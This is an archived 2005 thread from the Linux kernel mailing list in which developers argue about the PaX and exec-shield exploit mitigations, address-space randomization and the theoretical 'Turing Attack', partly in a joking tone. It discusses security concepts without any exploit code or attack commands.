* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 20:03 ` David Weinehall @ 2005-02-11 8:51 ` Mika Bostrom 0 siblings, 0 replies; 26+ messages in thread From: Mika Bostrom @ 2005-02-11 8:51 UTC (permalink / raw) To: linux-kernel [-- Attachment #1: Type: text/plain, Size: 1442 bytes --] [Posted only on LKML, this has become humour.] On Thu, Feb 10, 2005 at 09:03:00PM +0100, David Weinehall wrote: > On Thu, Feb 10, 2005 at 04:21:49PM +0100, Ingo Molnar wrote: > > > > * Jakob Oestergaard <jakob@unthought.net> wrote: > > > > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > > > > is in the 6th month, but that does not change the fundamental > > > > end-result: a child will be born ;-) > > > > > > Yes and no. I would think that the chances of a child being born are > > > greater if the pregnancy has lasted successfully up until the 6th month, > > > compared to a first week pregnancy. > > > > > > I assume you get my point :) > > > > the important point is: neither PaX nor exec-shield can claim _for sure_ > > that no child will be born, and neither can claim virginity ;-) > > > > [ but i guess there's a point where a bad analogy must stop ;) ] > > Yeah, sex is *usually* a much more pleasant experience than having your > machine broken into, even if it results in a pregnancy. =) I'll bite, before anyone else says it... It can not be a mere coincidence that the most rigorous security audits include penetration testing. -- Mika Boström +358-40-525-7347 \-/ "World peace will be achieved Bostik@iki.fi www.iki.fi/bostik X when the last man has killed Security freak, and proud of it. /-\ the second-to-last." -anon? [-- Attachment #2: Digital signature --] [-- Type: application/pgp-signature, Size: 189 bytes --] ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest)
  2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar
  2005-02-08 22:08 ` Ingo Molnar
@ 2005-02-08 22:41 ` H. Peter Anvin
  1 sibling, 0 replies; 26+ messages in thread
From: H. Peter Anvin @ 2005-02-08 22:41 UTC (permalink / raw)
To: linux-kernel

Followup to:  <20050208164815.GA9903@elte.hu>
By author:    Ingo Molnar <mingo@elte.hu>
In newsgroup: linux.dev.kernel

> This, on the face of it, seems like a ridiculous possibility, as the
> chances of that are inversely proportional to the number of bits
> necessary to implement the simplest Turing Machine. (which for
> anything even closely usable is on the order of 2^10000, less likely
> than the likelihood of us all living to the end of the Universe.)

2^10000?  Not even close.  You can build a fully Turing-complete interpreter in a few tens of bytes (a few hundred bits) on most architectures, and you have to consider ALL bit combinations that can form an accidental Turing machine.

What is far less clear is whether or not you can use that accidental Turing machine to do real damage.  After all, it's not computation (in the strict sense) that causes security violations, it's I/O.  Thus, the severity of the problem depends on which I/O primitives the accidental Turing machine happens to embody.  Note that writing to the memory of the host process is considered I/O for this purpose.

	-hpa

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-02 22:08 ` pageexec
  2005-02-03  9:44 ` Ingo Molnar
@ 2005-02-03 13:55 ` Peter Busser
  2005-02-03 14:39   ` Roman Zippel
  1 sibling, 1 reply; 26+ messages in thread
From: Peter Busser @ 2005-02-03 13:55 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel

On Wednesday 02 February 2005 23:08, pageexec@freemail.hu wrote:

> > and how do you force a program to call that function and then to execute
> > your shellcode? In other words: i challenge you to show a working
> > (simulated) exploit on Fedora (on the latest fc4 devel version, etc.)
> > that does that.

Ingo is assuming a best-case scenario here. Assumptions are the mother of all fuckups. This discussion does not address the issues which arise when:

- You compile code with a different compiler (say, OCaml, tcc, the Intel compiler, or whatever).
- You run existing commercial applications which have not been compiled with GCC.
- You mix GCC-compiled code with other code (e.g. a commercial Motif library).
- You link against libraries compiled with older GCC versions.
- And so on and so forth.

It can be fun to dive into a low-level details discussion. But unless you have solved the higher-level issues, the whole discussion is just a waste of time. And those higher-level issues won't be fixed unless people start to properly address worst-case behaviour, like any sensible engineer would do.

> i don't have any Fedora but i think i know roughly what you're doing,
> if some of the stuff below wouldn't work, let me know.

You've tried to educate these people before. You're wasting your time and talent. I think you should ask for a handsome payment when these people want to enjoy the privilege of being properly educated by someone who knows what he's talking about.

Greetings,
Peter.

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-03 13:55 ` Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Peter Busser
@ 2005-02-03 14:39   ` Roman Zippel
  2005-02-07 12:23     ` pageexec
  2005-02-07 18:31     ` John Richard Moser
  0 siblings, 2 replies; 26+ messages in thread
From: Roman Zippel @ 2005-02-03 14:39 UTC (permalink / raw)
To: Peter Busser; +Cc: pageexec, linux-kernel

Hi,

On Thu, 3 Feb 2005, Peter Busser wrote:

> - What happens when you run existing commercial applications which have not
>   been compiled using GCC.

From http://pax.grsecurity.net/docs/pax.txt:

   The goal of the PaX project is to research various defense mechanisms
   against the exploitation of software bugs that give an attacker arbitrary
   read/write access to the attacked task's address space.

Could you please explain how PaX makes such applications secure?

bye, Roman

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-03 14:39 ` Roman Zippel
@ 2005-02-07 12:23   ` pageexec
  0 siblings, 0 replies; 26+ messages in thread
From: pageexec @ 2005-02-07 12:23 UTC (permalink / raw)
To: Peter Busser, Roman Zippel; +Cc: linux-kernel

> From http://pax.grsecurity.net/docs/pax.txt:
>
>    The goal of the PaX project is to research various defense mechanisms
>    against the exploitation of software bugs that give an attacker arbitrary
>    read/write access to the attacked task's address space.
>
> Could you please explain how PaX makes such applications secure?

the answer should be in the doc you linked... if you have specific questions, feel free to ask.

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-03 14:39 ` Roman Zippel
  2005-02-07 12:23   ` pageexec
@ 2005-02-07 18:31   ` John Richard Moser
  0 siblings, 0 replies; 26+ messages in thread
From: John Richard Moser @ 2005-02-07 18:31 UTC (permalink / raw)
To: Roman Zippel; +Cc: Peter Busser, pageexec, linux-kernel

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Roman Zippel wrote:
> Hi,
>
> On Thu, 3 Feb 2005, Peter Busser wrote:
>
>> - What happens when you run existing commercial applications which have not
>>   been compiled using GCC.
>
> From http://pax.grsecurity.net/docs/pax.txt:
>
>    The goal of the PaX project is to research various defense mechanisms
>    against the exploitation of software bugs that give an attacker arbitrary
>    read/write access to the attacked task's address space.
>
> Could you please explain how PaX makes such applications secure?

I wrote an easy-to-chew article[1] about PaX on Wikipedia, although looking back at it I think there may be some errata in the ASLR concept; I think the mmap() base is randomized, but I'm not sure now whether the base of each individual mmap() call is randomized as shown in my diagrams. I'm also no longer sure where I got the notion that the heap/.bss/data segments are the same entity, and I'll have to check on that. Nevertheless, it's basically accurate, in the same way that saying you have a gameboy advance SP when you just have a gameboy advance is basically accurate.

[1] http://en.wikipedia.org/wiki/PaX

- --
All content of all messages exchanged herein are left in the Public
Domain, unless otherwise explicitly stated.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFCB7PlhDd4aOud5P8RAr+pAKCCcbqLuG7OQzZlJrd5UdsA3NooUgCePXnp D+xS98fWm9MVEBZpB+pIrTY= =r+20 -----END PGP SIGNATURE----- ^ permalink raw reply [flat|nested] 26+ messages in thread
end of thread, other threads:[~2005-02-11 8:52 UTC | newest] Thread overview: 26+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2005-02-02 16:51 Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Ingo Molnar 2005-02-02 22:08 ` pageexec 2005-02-03 9:44 ` Ingo Molnar 2005-02-03 14:20 ` pageexec 2005-02-03 20:20 ` Ingo Molnar 2005-02-07 14:23 ` pageexec 2005-02-07 21:08 ` Ingo Molnar 2005-02-08 12:27 ` pageexec 2005-02-08 21:23 ` Ingo Molnar 2005-02-07 22:36 ` Ingo Molnar 2005-02-08 12:27 ` pageexec 2005-02-08 13:41 ` Ingo Molnar 2005-02-08 14:25 ` Julien TINNES 2005-02-08 16:56 ` Ingo Molnar 2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar 2005-02-08 22:08 ` Ingo Molnar 2005-02-10 13:43 ` Ingo Molnar 2005-02-10 13:58 ` Jakob Oestergaard 2005-02-10 15:21 ` Ingo Molnar 2005-02-10 20:03 ` David Weinehall 2005-02-11 8:51 ` Mika Bostrom 2005-02-08 22:41 ` H. Peter Anvin 2005-02-03 13:55 ` Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Peter Busser 2005-02-03 14:39 ` Roman Zippel 2005-02-07 12:23 ` pageexec 2005-02-07 18:31 ` John Richard Moser
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox